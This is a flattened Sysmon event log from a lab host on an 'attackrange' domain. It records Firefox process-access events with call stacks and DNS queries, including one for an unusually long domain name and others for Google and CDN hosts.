14:01:24.855{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.794{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.794{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.794{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.790{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.784{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.778{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.773{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.773{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.748{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.748{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.746{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.744{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.740{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.739{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.293{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.292{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000018238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.027{59A5CD1D-945A-6005-3305-00000000A301}7052iamtheproudownerofthelongestlongestlongestdomainnameinthisworld.com0166.62.107.20;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.026{59A5CD1D-945A-6005-3305-00000000A301}7052iamtheproudownerofthelongestlongestlongestdomainnameinthisworld.com0::ffff:166.62.107.20;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.824{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.823{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.605{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.600{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.579{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.342{59A5CD1D-945A-6005-3305-00000000A301}7052www-google-analytics.l.google.com02a00:1450:4001:803::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.341{59A5CD1D-945A-6005-3305-00000000A301}7052www-google-analytics.l.google.com0172.217.23.174;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.340{59A5CD1D-945A-6005-3305-00000000A301}7052www.google-analytics.com0type: 5 www-google-analytics.l.google.com;::ffff:172.217.23.174;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.186{59A5CD1D-8E56-6005-2E00-00000000A301}246420.107.62.166.in-addr.arpa.0type: 12 ip-166-62-107-20.ip.secureserver.net;C:\Windows\sysmon64.exe 22542200x800000000000000018267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.184{59A5CD1D-8E56-6005-2E00-00000000A301}246422.249.124.192.in-addr.arpa.0type: 12 cloudproxy10022.sucuri.net;C:\Windows\sysmon64.exe 22542200x800000000000000018266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.140{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.starfieldtech.com0type: 5 ocsp.godaddy.com.akadns.net;::ffff:192.124.249.24;::ffff:192.124.249.36;::ffff:192.124.249.41;::ffff:192.124.249.22;::ffff:192.124.249.23;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.114{59A5CD1D-945A-6005-3305-00000000A301}7052secureservercdn.net02a02:fe80:1010::16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.112{59A5CD1D-945A-6005-3305-00000000A301}7052secureservercdn.net0192.124.249.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.112{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com0172.217.22.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.111{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com0::ffff:172.217.22.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.111{59A5CD1D-945A-6005-3305-00000000A301}7052secureservercdn.net0::ffff:192.124.249.16;C:\Program Files\Mozilla Firefox\firefox.exe 